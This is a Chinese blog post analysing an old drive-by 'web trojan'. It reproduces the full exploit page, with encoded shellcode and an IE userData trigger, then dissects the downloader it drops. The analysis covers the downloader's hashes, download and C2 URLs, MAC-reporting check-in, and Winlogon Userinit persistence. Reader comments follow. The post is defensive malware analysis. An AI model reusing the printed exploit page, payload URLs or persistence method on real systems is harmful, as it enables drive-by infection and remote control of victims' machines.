简单分析一个网马

看到个帖子：

http://www.90sec.org/thread-2363-1-1.html

360报毒在本机缓存发现，求解密。。

<HTML>
<BODY>
<BUTTON id=aaa style='DISPLAY: none' onclick=a1();></BUTTON>
<script src='js.js'>
</script>
<SCRIPT language=javascript>
var a4 = unescape('%u5858%u5858%u10EB%u4B5B%uC'+'933%uB96'+'6%u03B8%u34'+'80%uBD0B%uFA'+'E2%u05E'+'B%uEBE8%uF'+'FFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D'+'2%uBDBD%uC8D5%uD1CF%uE9D0%uAB4'+'2%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCE'+'D5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uED'+'BD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uB'+'FBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB'+'8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4'+'136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2A'+'D8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA66'+'9%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D'+'7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE'+'%ud5db%uc9c9%u87cd%u9292%u8588%u8f93%u8c8f%u8993%u9388%u858c%u878f%u8c85%u8f8c%u8c92%ud893%ud8c5%uBDBD%uBDBD%uEAEA%uEAEA%uEAEA%uEAEA');
function a1()
{
acv2();
var a7 = document.createElement('body');
a7.addBehavior('\u0023\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0023\u0075\u0073\u0065\u0072\u0044\u0061\u0074\u0061');
document.appendChild(a7);
try {
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
a7.setAttribute('s',window);
} 
catch(e){ }window.status+='';
}
document.getElementById('aaa').onclick();
var ggggg = "stropt";
</SCRIPT>
</BODY>
</HTML>

网马样本为：2010年4月的极风0day网马，很老的网马了，分析如下：

小马地址：

http://58.221.45.182:8112/1.exe

Size: 6.44 KB (6,600 Bytes)

MD5: 4ae45ec367c6276780b94e4963c8fc7c

SHA1: 63d98487caed469ff9cbb8245b9c560f8fb8fafa

SHA256: b2f323cba81e4c7d76909693f3834f44cdb4a117321fedc9f6d94135e9a31280

加了压缩壳：

MD5: 4AE45EC367C6276780B94E4963C8FC7C

NSpack V3.7 -> LiuXingPing

脱壳后：

MD5: EC0B34FC81395DA811D2EE7209CE8F40

大小: 27.5 KB (28,219 字节)

Microsoft Visual C++ 6.0

调用敏感函数：

URLDownloadToFileA //下载文件并保存

WinExec //执行某个程序

DeleteFileA //删除指定文件

CopyFileA //复制文件

GetAdaptersInfo //获取网卡详细信息

一般是用来获取网卡MAC地址，控制系统用来统计唯一安装客户端数量用的。

下载列表地址：

http://ucc.iiuaa.com:1234/www1.txt

内容：

http://kk.utherar.com:7654/pd.exe

http://kk.utherar.com:7654/qsk.exe

http://kk.utherar.com:7654/chaj.exe

http://kk.utherar.com:7654/qse.exe

http://kk.utherar.com:7654/qso.exe

http://kk.utherar.com:7654/qsa.exe

http://kk.utherar.com:7654/qst.exe

http://kk.utherar.com:7654/qsq.exe

http://kk.utherar.com:7654/cpc.exe

http://kk.utherar.com:7654/gr.exe

上线地址：

http://118.129.161.180:900/getparams.ashx

会给上线系统提交以下内容：

%s?mac=%s&pnum=%d&ver=%s

说明：

http://118.129.161.180:900/getparams.ashx?mac=网卡MAC&pnum=整形数字(进程ID?)&ver=版本号

配置文件：

%c%c%c%c%c.ini

写注册表：

路径：LM\Software\Microsoft\DownloadManager

路径：LM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

子项：Userinit

类型：REG_SZ/REG_SZ

大小：68/200

值：C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\Tasks\conime.exe"

正常的值为："C:\Windows\system32\userinit.exe,"

作用：开机自启动，C:\WINDOWS\Tasks\conime.exe 为安装路径。

搞笑的是，还写了个：ASCII "nimamabidedongxi"，“你妈妈逼的东西”。

╮(╯_╰)╭

API 操作：

C:\TEST\sample.exe 0x40178c CopyFileA(lpExistingFileName: "C:\TEST\sample.exe", lpNewFileName: "C:\WINDOWS\Tasks\conime.exe", bFailIfExists: 0x0)|0x1

总体评价：

垃圾下载者一个，所有下载执行操作几乎全部调用的普通 API，没有任何绕过主动防御的代码。

目测该下载者无法绕过任何主动防御，而且代码很简单，被杀很严重。

估计是直接网上找了个源码，改了改就用了，无语……

留言评论（旧系统）：

【匿名者】 @ 2012-05-21 15:45:48

90sec？是个什么样的组织？可否大致介绍下？

本站回复：

一个论坛，聚集了一些伪黑客，水准一般。

日月 @ 2012-05-21 15:57:36

我发现看核老大的分析文章受益颇多。尼玛，一时居然没想起查看当前用户名和组的命令了，回去补基础 555

本站回复：

╮(╯_╰)╭

【匿名者】 @ 2012-05-21 21:41:49

这个分析看起来像是金山的那个分析啊

本站回复：

跟金山有毛关系？

文章目录